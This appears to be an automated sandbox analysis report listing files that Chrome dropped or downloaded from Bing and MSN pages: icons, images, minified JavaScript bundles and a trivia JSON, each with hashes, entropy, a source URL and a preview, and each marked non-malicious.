                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):726
                                                                                                                                                                                                                                                                        Entropy (8bit):4.636787858533541
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:tbH41nlcWYiB1+Xl0ML2t1iOfEmmgaUEUZQ6nMAIPWSxs4yPISEIe9t8aayPISEx:t741nTYifqLL2+O7mgaxSQ6MFnE3nkO
                                                                                                                                                                                                                                                                        MD5:6601E4A25AB847203E1015B32514B16C
                                                                                                                                                                                                                                                                        SHA1:282FE75F6FED3CFC85BD5C3544ADB462ED45C839
                                                                                                                                                                                                                                                                        SHA-256:6E5D3FFF70EEC85FF6D42C84062076688CB092A3D605F47260DBBE6B3B836B21
                                                                                                                                                                                                                                                                        SHA-512:305C325EAD714D7BCBD25F3ACED4D7B6AED6AE58D7D4C2F2DFFCE3DFDEB0F427EC812639AD50708EA08BC79E4FAD8AC2D9562B142E0808936053715938638B7C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16">.. <path d="M0 0h16v16h-16v-16z" fill="none"/>.. <path fill="#007DAA" d="M11 4h4l-5-4v3c0 .552.447 1 1 1zm-3-1v-3h-4.5c-.828 0-1.5.672-1.5 1.5v13c0 .828.672 1.5 1.5 1.5h10c.828 0 1.5-.672 1.5-1.5v-8.5h-4c-1.654 0-3-1.346-3-3zm4.707 10.707c-.181.181-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293s.293.431.293.707-.112.526-.293.707zm0-5.414c.181.181.293.431.293.707s-.112.526-.293.707-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293z"/>..</svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1304
                                                                                                                                                                                                                                                                        Entropy (8bit):4.767968631693785
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YogdqtOLxL1iKCSzSQxmdfpkZnEDoAQE:TjtOniKCSlmJpCncx
                                                                                                                                                                                                                                                                        MD5:671DDC2887FB01DFC418864231D503E0
                                                                                                                                                                                                                                                                        SHA1:C709A9F97B41095CD1A0436FDE285467AC460147
                                                                                                                                                                                                                                                                        SHA-256:E2D2752332894DBDC79D3690468FD5811B38A7AB1380AD788165F1458C9C1968
                                                                                                                                                                                                                                                                        SHA-512:D65ECB575D650443B0FACFC74ECD0B9173B38AA2D497DE066F13A5DF892899040FACFE293C055FB4667DACD0FAB904B85B7C06EFC4C455645254ECE1BDA8A59F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....NIDATx..SMkSA.=..%R....4..QP.XHM7fSL.@. ]....HQAD...A..;A.;EH......DE("...j..&mc.....Lx1../.;w.93w.^.-b%3.$.i.#...M..>3.x\..s..R'..`T...<.].=.f.8.t..h.&/9...&...k.....p% ]...`....@..<.....M`..[......b....K...&.W5.A..]3..vb....J)/h7.)].........-%|...s?14.%...i.z5a.|....@..h..u..f..8..g.=.[XBz1...P..J!....E..Z...O..t..#..>._...`..QWa..-..lG........&..C....7.\.Fzi..Q{E/P....=G.<.}+....j.W.......o".*....F.g....v.;..TZ.*l..B$.......w.b..r...2.?.a.,;.~..C..E.!..:x._.|..sn...R. ....%.....*.q'..&......|"......;.WU.......a3...>.7....<U..2M....'....v.S.Lp...........T)....IEND.B`.............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (49890), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):49890
                                                                                                                                                                                                                                                                        Entropy (8bit):5.277413721220006
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:w0+xgE1upNf+awP/o/lglV9YForuZK6y4v2Cd8cA2YIHCqg+R/Y84zcV8TSmWXFq:wr168Xq8zx2mWXvqH+MW2FTIYRv/B
                                                                                                                                                                                                                                                                        MD5:DAE77611220E36671173E1F84BC55B86
                                                                                                                                                                                                                                                                        SHA1:1B6971B4A582CEE6EB92C8B138895AC2C7F5F671
                                                                                                                                                                                                                                                                        SHA-256:7EBE7CF486536B3D482F6C4F08D04B05290432EA7032A79F164D2660CA8E6365
                                                                                                                                                                                                                                                                        SHA-512:35B8A3B1BD26AD310EBD8892B7174314984A6BEE202794528F7BB6E59E0AEE9546469B4F4E47C118DADB14ACC86823A2249C028A5740F34B5B727EFCF58A4941
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/topic-data-connector.9f232d5ecf2e5b89935a.js
                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["topic-data-connector"],{76868:function(e,t,i){var s;i.d(t,{y:function(){return s}}),function(e){e[e.MuidChange=1]="MuidChange",e[e.MarketChange=2]="MarketChange",e[e.InterestsChange=3]="InterestsChange",e[e.PivotSwitch=4]="PivotSwitch",e[e.WeatherChange=5]="WeatherChange",e[e.MoneyChange=6]="MoneyChange",e[e.FeedLayoutSwitch=7]="FeedLayoutSwitch",e[e.FetchRiverDataFailure=8]="FetchRiverDataFailure",e[e.BackgroundImageChange=9]="BackgroundImageChange",e[e.PublisherMuted=10]="PublisherMuted",e[e.StalePrerenderPage=11]="StalePrerenderPage",e[e.AdminSettingsChange=12]="AdminSettingsChange"}(s||(s={}))},44039:function(e,t,i){i.d(t,{yV:function(){return o}});var s=i(987);new Set;function o(e){const t={time:n(),data:e};(0,s.$o)().setObject("fpr",t)}function n(){return Math.round(performance.timeOrigin+performance.now())}},16330:function(e,t,i){var s;i.r(t),i.d(t,{FeedType:functio
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2996), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2996
                                                                                                                                                                                                                                                                        Entropy (8bit):5.366105471104399
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:J48ZVpZepsJrkTScZV7pw2B7waeaTo8Xvet0cnYBLm7QA03RzsGXFLChF8YiS5xJ:JQcrkTDZV7e2maeaTowrBLm0A03RQqst
                                                                                                                                                                                                                                                                        MD5:A4A2895E7FBFE6377307B4C2AAB9E525
                                                                                                                                                                                                                                                                        SHA1:399FCAD73E013BAB2867567B731B0E0EAA278A49
                                                                                                                                                                                                                                                                        SHA-256:2F754393D443981912BDD0E557B8CF9724B956E552C50BFD75044848AC347AA5
                                                                                                                                                                                                                                                                        SHA-512:0FBC750A57C1A05577017FFA77FE03881FC12D7DB641F14BCDAA3EFF4FD38880D3147B6BC666E27A63A1FE3D37679CD0DE060C05B8E8E76DD36FC23296FF45B3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/OZ_K1z4BO6soZ1Z7cxsODqonikk.js
                                                                                                                                                                                                                                                                        Preview:var Bnp=Bnp||{};Bnp.Global=Bnp.Global||{};Bnp.Version="1";Bnp.Partner=Bnp.Partner||function(){function i(){return typeof DefaultTrustedTypesPolicy!="undefined"}function s(n){return i()&&DefaultTrustedTypesPolicy.getOpaqueHTML?DefaultTrustedTypesPolicy.getOpaqueHTML(n):n}function h(n){return i()&&DefaultTrustedTypesPolicy.getOpaqueScript?DefaultTrustedTypesPolicy.getOpaqueScript(n):n}function c(n){return i()&&DefaultTrustedTypesPolicy.getOpaqueScriptURL?DefaultTrustedTypesPolicy.getOpaqueScriptURL(n):n}function f(n){sj_evt.fire("onBnpRender",n)}function r(n){var i=i||{};if(typeof i.stringify=="function")return i.stringify(n);var o=typeof n,u=n&&n.constructor==Array,f=[],e,t;if(o!="object"||n==null)return o=="string"?'"'+n+'"':String(n);for(e in n)t=n[e],t&&t.constructor!=Function&&(u?f.push(r(t)):f.push('"'+e+'":'+r(t)));return(u?"[":"{")+String(f)+(u?"]":"}")}function l(n){for(var r=[],u=n.getElementsByTagName("script"),t,i;u.length;)t=u[0],i=sj_ce("script"),t.src?i.src=c(t.src):t.text
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:51:08], progressive, precision 8, 160x158, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4547
                                                                                                                                                                                                                                                                        Entropy (8bit):7.735536921390623
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ssb41dk9JozAQ8d2SuBK76KrZDoDBtnFKiDo8TzNnNJSHvLPS:sj1eozAQ8d2VPGoBBFfM4fJSHDPS
                                                                                                                                                                                                                                                                        MD5:7AEF4CCF6E47B9BA038365CD3D1F5693
                                                                                                                                                                                                                                                                        SHA1:71F7957F6FAE574854A374E84DB2E3CEDBA89969
                                                                                                                                                                                                                                                                        SHA-256:08102BA7A0388B1AFC9A351B3387B2DDEDA846551303170E0273B2F305AECCB2
                                                                                                                                                                                                                                                                        SHA-512:29AC1E6BADF62C61B4FA889EA1B0436D3B9107A60BA03801DFA8E23A4D8BCCF42C09BB7CC7E6CD9FACB8D140DB7E0D4F0EEB3D7D8A3B9B38B1D2B95113005320
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:51:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................VQJ,..R...)..(..R..d.Y@...h..%(.AW(T.)...5.,.%.2[.."*!l...Z......@I..T.......@3.@....D@ ..l.)E.P....ts......@... E".W/G...........IQ..I|../.,..W..(....WY.1<.t..=....K...C....-.1..s.[l...^].mO7|..:.kda5....o.=.S.8.;....~e,.......1v..~5.:s'$..u.i..k.7._E25...f6v..Nk.&)....S.r...ovn5...k9k...u.D...f&.......e.+.7......d..7K.R]..f..K..l...r...*.K.b..s29...y;..U.E(.qH....,....QS%..@....'......................... !."1.#$0@.`............R.J..e~...+.J.....y..7#..^....,.....@.3..`.....L...[u.!.../...*;[7.,...a....[._W...B;.....4g+../c..>g...!..U..Q...0...$..F%...u|.2?.V.>.v..2.2.S.c..km)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (425), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):425
                                                                                                                                                                                                                                                                        Entropy (8bit):4.963129739598361
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2gXsmzwKN0yApFkRLNF1Jfa1VTWPMg9pIGywV:2gX9zwKN0yAqr1Jfa1V059V
                                                                                                                                                                                                                                                                        MD5:016ECFDB34031F881FA5E34DFBD0B7A1
                                                                                                                                                                                                                                                                        SHA1:16D3BA1049939D00AE47AAD053993B4762D9B102
                                                                                                                                                                                                                                                                        SHA-256:08021ED3BCA5532304B597E636BEB939FF7BAA6D08DCA4E94C0DDE1FDF940389
                                                                                                                                                                                                                                                                        SHA-512:D61045D1F07ED241626B8233D388F5E1AD54DBE224871E1CE872ECFD0E29F05A21F0EA02FFDE688FACB134DD969533615493BD35EBA4D5E755840C30A687EE00
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:(function(n){function f(){u(sj_be,r)}function r(i){return i&&n.enqueue(t,i),!0}function e(){u(sj_ue,r)}function u(n,t){for(var u,r=0;r<i.length;r++)u=i[r],n(u==="resize"?window:document,window.navigator.pointerEnabled?u.replace("mouse","pointer"):u,t,!1)}var t="EVT",i=["click","mousedown","mouseup","touchstart","touchend","mousemove","touchmove","scroll","keydown","resize"];n.wireup(t,{load:f,compute:null,unload:e})})(BM)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):49414
                                                                                                                                                                                                                                                                        Entropy (8bit):7.786337557112325
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:eXE/6WOXA8PSYII3AhacUdETPWFr6I/DzSdIwToogvGN:gXWwA86YT3CacUdE6Fr6I/yqwTBgvGN
                                                                                                                                                                                                                                                                        MD5:34EE08F8009454029F63D7A7B29B8734
                                                                                                                                                                                                                                                                        SHA1:4FF9B969FD247385B7B537E27AB755ABF10B619B
                                                                                                                                                                                                                                                                        SHA-256:0B5DB1273969107A2927391E904E7E70B1B15D40568CE11717A8B6899BB7B623
                                                                                                                                                                                                                                                                        SHA-512:2B728A0F02F1D41F29BCC5E4CBF29E138F199450A1AFCBC7B6B2790E2A8BCE6AB71B19DB7668A40D0F6B702DD1931B90FC60EE1ECB776DA2DDBF8053C068D68F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/staticsb/statics/latest/widget/LoadingImg.gif
                                                                                                                                                                                                                                                                        Preview:GIF89a2.2..?.......................................................................................................................................................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:c996674d-1dbc-4dcb-94bf-c133a5e098f7" xmpMM:DocumentID="xmp.did:D4316C07BD1811EC9355E848C6087788" xmpMM:InstanceID="xmp.iid:D4316C06BD1811EC9355E848C6087788" xmp:CreatorTool="Adobe Photoshop 23.3 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c996674d-1dbc-4dcb-94bf-c133a5e098f7" stRef:documentID="xmp.di
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):34378
                                                                                                                                                                                                                                                                        Entropy (8bit):7.970622899567605
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:eJMSO+lnaEO5gOiosLEpzqDqag2i0dgXsySUV:eI+aEyMo5uDJuigXiUV
                                                                                                                                                                                                                                                                        MD5:69E7CA22E5B7A8B2B0FEC6F355ABBD3E
                                                                                                                                                                                                                                                                        SHA1:2D1E2856988456EEAAA78A66E77CEADA986F832D
                                                                                                                                                                                                                                                                        SHA-256:5F1338BCE7F311271704B361430589304FC71BB366122221959E888A6F6ED3FF
                                                                                                                                                                                                                                                                        SHA-512:EF68C3B13998AFE8B7852A5F29E52B83350102AB2790747266767797CC5567A2CE99B09F32D08AE10E8C4C7571214B9B43816AD8CAA6FF0B9655F9562B6518BE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.06fe08758255ed5bea54b10904780623&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?../N.5?.~9....@..Y].!.\4...j.G....x,.r{.|Z.g....\....W..[2.oqr...A.....a.),@.....x5>..:W..i.]z?.Xy..T..ha..H`.B..m.2.7.8...-..~7h..iy...hp]..{.8..y.3.a.......A......M.-.........a.....G.4......E..Xm...g........$.?w..RA.....\..lf.....T..}"-...|.w...C.o.*F..`..AR2...|..>#k...j.>..':d.<2.......X......cs.(.....4?..h.Lz..i%.,-......C,.M.....x.m....y.`..O.o.....:s6.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2356
                                                                                                                                                                                                                                                                        Entropy (8bit):7.788530055266728
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8/bxnuERAvS9eAtaN2w1Z7zutSXaUlOBpQdJ3dLCq6yRZ/RSFGHFPG:8zgEP0At3w1Z7z0SXXA+tGqdhIgQ
                                                                                                                                                                                                                                                                        MD5:3545ED1A882A931AE397E94703D788CE
                                                                                                                                                                                                                                                                        SHA1:E99A1DFD963E470A826454C371697414AAD49013
                                                                                                                                                                                                                                                                        SHA-256:0B71FD3B45AC99E1BB3FD3B27C690D9A227BFA2A9162EDCE621D59C73023D0B7
                                                                                                                                                                                                                                                                        SHA-512:2758702A250A46930537E102008EA502CD6C3407D406102735C857CFC915BC6E19FFB519426C9A2088725707D027CB9150CC474F1010F9CA79B5AFF7C0428B8D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........m9.5..h...a..t=..|.......)...KH.....G.PpsM.z.u.e.m.......Mn......$.*..~...\...{......D..........J....x........ ..Ed.6z.h.[.Rj.."k}>.z.|...Y.cX..N.&..C"!.f\...-WFW....o......g..]...>....u\.*0...Wdc.*.W...`..p..|.NjLS....F)1@....&3L.:S...........4..E.ZR>jLT.$?z...E..d.50.:..M.<r=..1KF1E.....u.n/`......^...N.G....A..Ty..8`:s..D...hxs.."6...8.T:T...i..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1225
                                                                                                                                                                                                                                                                        Entropy (8bit):5.268483399933616
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YuJGpv0vtRWCsG65UGbOoOx7FQLRWCsG65UGpuA+oOYhHHURWCsG65UGRIoXXc:YRl0vAG6JbsQeG6Jg+BHTG6JRu
                                                                                                                                                                                                                                                                        MD5:F7E31D867F86464E752C85C32C5042F5
                                                                                                                                                                                                                                                                        SHA1:3760C207BFBC44427A2784A1DD379EBC92234457
                                                                                                                                                                                                                                                                        SHA-256:ADBE195CDF90F061AF812544C1063E7A2B0DFAE84B47B0A2D571210F6BFDC85B
                                                                                                                                                                                                                                                                        SHA-512:68CB822EE77E58E08E95847A579407C3EF8A60B54E194B1225EDC0EF512ED9A845BD1F0475536B9DCD154BB5B5ED6A141478BCFEEAFAF424489E4253F569B6A7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/hp/api/v1/trivia?format=json&id=HPQuiz_20231206_CERNCenter&
                                                                                                                                                                                                                                                                        Preview:{"title":"","data":{"question":"What's the name of this eye-catching building at the CERN particle physics research center?","options":[{"text":"Exploratorium","url":"/search?q=globe+of+science+and+innovation&filters=IsConversation%3A%22True%22+btrequestsource%3A%22homepage%22+WQOskey%3A%22HPQuiz_20231206_CERNCenter%22+WQId%3A%221%22+WQQI%3A%220%22+WQCI%3A%220%22+UserChoices%3A%220%22+ShowTimesTaskPaneTrigger%3A%22false%22+WQSCORE%3A%220%22&FORM=HPQUIZ","bullet":"A"},{"text":"Center for Innovators and Dreamers","url":"/search?q=globe+of+science+and+innovation&filters=IsConversation%3A%22True%22+btrequestsource%3A%22homepage%22+WQOskey%3A%22HPQuiz_20231206_CERNCenter%22+WQId%3A%221%22+WQQI%3A%220%22+WQCI%3A%221%22+UserChoices%3A%221%22+ShowTimesTaskPaneTrigger%3A%22false%22+WQSCORE%3A%220%22&FORM=HPQUIZ","bullet":"B"},{"text":"The Globe of Science and Innovation","url":"/search?q=globe+of+science+and+innovation&filters=IsConversation%3A%22True%22+btrequestsource%3A%22homepage%22+WQOskey
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6602
                                                                                                                                                                                                                                                                        Entropy (8bit):7.94064342551898
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:ygwBDqHxDzbqllo8AXbpYEm2PcTdHdSiyKllYBVrc:ygwBDyXbqlTybFu9yaKBu
                                                                                                                                                                                                                                                                        MD5:2EC5FDE3796806B70652B8CF1A6CD9B4
                                                                                                                                                                                                                                                                        SHA1:A994F484136E6582D4D3F5E98FC45A87C7D1FA00
                                                                                                                                                                                                                                                                        SHA-256:544A2240A7DA1E493494687EF632B25ECAF0953190F69CA85180486F6D623175
                                                                                                                                                                                                                                                                        SHA-512:51C9A44A72DF57CC270D9ECCAF7B2474B4B8ADF70B0EF4BCE0F7B984B7CEC3AEC27DC874BF2AAAF5E06CC749F50139CB0E4BF2CAB2ADB0CFAA401E69CA95A585
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...WCo.....kpn._-.W$.....3m.Z6..5.1..ts:.P.J....=Os.u3...we...D.a.L\YD.f.0.s6.N...Dm...q....8....M^ig..}+Kv.......O..>.@..I .S.+...Z.IM].Z.kQ..4.b..H...*...c....Gd"3F.....l.....}u.[Cwl.'.v..9...G.P.!...I..v..rX..Zm......5mr.V..I.X.8.,0..~...M...ue ug..bV...I..M............n\.n.....Sq..[9?.c)_C..]..M..aH....^I<Q<..hc.`.p.b_..g.K.)d..H..l!'.....I...../.(
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5263
                                                                                                                                                                                                                                                                        Entropy (8bit):7.921719759334495
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEipGg/vmrYIbmx1tEt/uiIsx08BHJxshG8BXPpJR65L6Am82o8jima:yg9kei/uBsRBHJxspBR/zPoRX
                                                                                                                                                                                                                                                                        MD5:2313C158992B830B3670618A4D832391
                                                                                                                                                                                                                                                                        SHA1:9E43E00516ACB30C1BA255E7A1030827ADC2B26C
                                                                                                                                                                                                                                                                        SHA-256:475D87DBF6B646501017FF38A02ECD7B80F990541674549AC043B6F40F7CCFD3
                                                                                                                                                                                                                                                                        SHA-512:FEA277A3F18E9210F82A98BEF35474A7E6EFEC43EC1D163ED87CFCEAE561F956C33ABD36ACDCBDED66EC840979B184FC8BE027F430D27DD009ABCB24982D601E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...OO.-..,..k.._/R....^..[.V...........<&....6....:u....v=[.z...h....E.[Id.._._+..^.M.f#a.nC..N(Z5`r1.].h.pe..7.>..q>UA$...5j..{....m..\G..Q'vZV;....R.....(5}...O{... ......G..N....EX...u.. wy.rO&...q..';.=c...`.Z..# ..<...2....\..5K{.b.J"h..O.".[./Q...v...^iF...".)r..&_4B.s..Fz..I....i....D.6..Bv...v....=.`.jw&.7..3.<V...4...xIeu.0.=....3..9%t2... ...3;
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):24844
                                                                                                                                                                                                                                                                        Entropy (8bit):7.95983378893552
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:ezU9UfVSjr0RMalTqooR5iDVii3fl384H6map:ezWCVYrqM4f9Doi3fRamap
                                                                                                                                                                                                                                                                        MD5:B611E0629D27C7FEE5477AA42419E19B
                                                                                                                                                                                                                                                                        SHA1:98A50143A790C91087E1D065A03CF0400A4BDC63
                                                                                                                                                                                                                                                                        SHA-256:14AA3A01B5E538CE2E8858EB69D75B4C2ACA4DE43A3D388988D37C648E89BBDC
                                                                                                                                                                                                                                                                        SHA-512:7BDCA5338DE047F4A2C9AC7B8A9DAEACABAFE2F5BDFF9D8284E083846DE2E1A3A3EDF1497D7DE06F240742CCA50C7958B5B53FFB6707B2FE620B519E3FA3E363
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.d7939cd27891ec0113c3902632ba1037&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
